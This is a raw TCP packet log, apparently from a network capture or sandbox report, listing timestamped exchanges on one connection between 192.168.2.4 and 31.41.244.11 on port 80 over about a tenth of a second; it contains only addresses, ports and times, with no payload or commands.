Dec 22, 2024 02:16:13.411252022 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.411277056 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.411283016 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.411324978 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.411925077 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.411971092 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.412045956 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.412095070 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.412766933 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.412802935 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.412821054 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.412838936 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.412857056 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.412873030 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.412879944 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.412906885 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.412924051 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.412944078 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.412959099 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.412997007 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.413670063 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.413721085 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.414537907 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.414572954 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.414591074 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.414608955 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.414622068 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.414661884 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.415361881 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.415397882 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.415421963 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.415433884 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.415451050 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.415471077 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.415479898 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.415505886 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.415515900 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.415556908 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.416188002 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.416224003 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.416249990 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.416258097 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.416269064 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.416292906 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.416312933 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.416327000 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.416349888 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.416363001 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.416374922 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.416414022 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.417009115 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.417062998 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.417063951 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.417099953 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.417118073 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.417140961 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.417155027 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.417190075 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.417202950 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.417227983 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.417237997 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.417279005 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.417898893 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.417934895 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.417951107 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.417970896 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.417989016 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.418009996 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.418021917 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.418045998 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.418061018 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.418096066 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.418669939 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.418720961 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.418725014 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.418761015 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.418775082 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.418797016 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.418808937 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.418832064 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.418852091 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.418869972 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.418876886 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.418926954 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.419636965 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.419672012 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.419692993 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.419707060 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.419728994 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.419742107 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.419763088 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.419780970 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.419800997 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.419825077 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.420489073 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.420525074 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.420542002 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.420562029 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.420579910 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.420603991 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.420615911 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.420650005 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.420660973 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.420685053 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.420711994 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.420737028 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.421261072 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.421312094 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.421320915 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.421356916 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.421370029 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.421392918 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.421408892 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.421427965 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.421447039 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.421468973 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.422183037 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.422219038 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.422234058 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.422254086 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.422270060 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.422348022 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.422357082 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.422383070 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.422400951 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.422419071 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.422435045 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.422467947 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.422980070 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.423037052 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.423057079 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.423091888 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.423125982 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.423145056 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.423145056 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.423161983 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.423167944 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.423228979 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.423878908 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.423914909 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.423935890 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.423949003 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.423959970 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.423985004 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.424004078 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.424021006 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.424029112 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.424056053 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.424062014 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.424103975 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.424704075 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.424761057 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.424767971 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.424796104 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.424809933 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.424832106 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.424848080 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.424866915 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.424882889 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.424905062 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.424917936 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.424952984 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.425538063 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.425591946 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.425591946 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.425643921 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.425645113 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.425682068 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.425697088 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.425715923 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.425734043 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.425767899 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.426443100 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.426477909 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.426500082 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.426512957 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.426522970 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.426549911 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.426561117 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.426584005 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.426595926 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.426620007 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.426629066 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.426666021 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.427361012 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.427397013 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.427413940 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.427432060 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.427448988 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.427467108 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.427479029 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.427516937 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.428142071 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.428178072 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.428196907 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.428210020 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.428221941 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.428245068 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.428261042 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.428281069 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.428297043 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.428317070 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.428332090 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.428366899 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.429044008 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.429079056 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.429090023 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.429114103 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.429121971 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.429150105 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.429163933 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.429186106 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.429202080 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.429224968 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.429857016 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.429912090 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.429922104 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.429958105 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.429972887 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.430005074 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.430680037 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.430706978 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.430722952 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.430725098 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.430756092 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.430757046 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.430773973 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.430790901 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.430794001 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.430819988 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.430845976 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.431574106 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.431593895 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.431611061 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.431627035 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.431643963 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.431662083 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.431662083 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.431662083 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.431703091 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.431703091 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.432432890 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.432451963 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.432467937 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.432483912 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.432493925 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.432493925 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.432501078 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.432516098 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.432518005 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.432537079 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.432564020 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.432564020 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.433163881 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.433212996 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.523111105 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.523204088 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.523447990 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.523489952 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.523514032 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.523540974 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.524758101 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.524827957 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.524849892 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.524909019 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.525896072 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.525958061 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.526005030 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.526057005 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.527271032 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.527348042 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.527389050 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.527451992 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.528642893 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.528709888 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.528728962 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.528783083 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.530008078 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.530073881 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.530117035 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.530169964 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.531366110 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.531434059 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.531498909 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.531554937 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.532727957 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.532788038 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.532901049 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.532947063 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.534116030 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.534174919 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.534249067 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.534306049 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.535449028 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.535516024 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.535554886 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.535612106 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.536828995 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.536890984 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.536951065 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.537004948 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.538182020 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.538239956 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.538269997 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.538325071 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.539585114 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.539642096 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.540210962 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.540271997 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.540365934 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.540421009 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.541599035 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.541660070 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.541726112 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.541788101 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.543715954 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.543787003 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.543876886 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.543982983 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.544332981 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.544404030 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.544441938 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.544498920 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.545723915 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.545782089 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.545826912 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.545891047 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.547055960 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.547131062 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.547207117 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.547261953 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.552738905 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.552813053 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.552855015 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.552892923 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.552906990 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.552949905 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.552993059 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.553039074 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.553050041 CET	80	49765	31.41.244.11	192.168.2.4
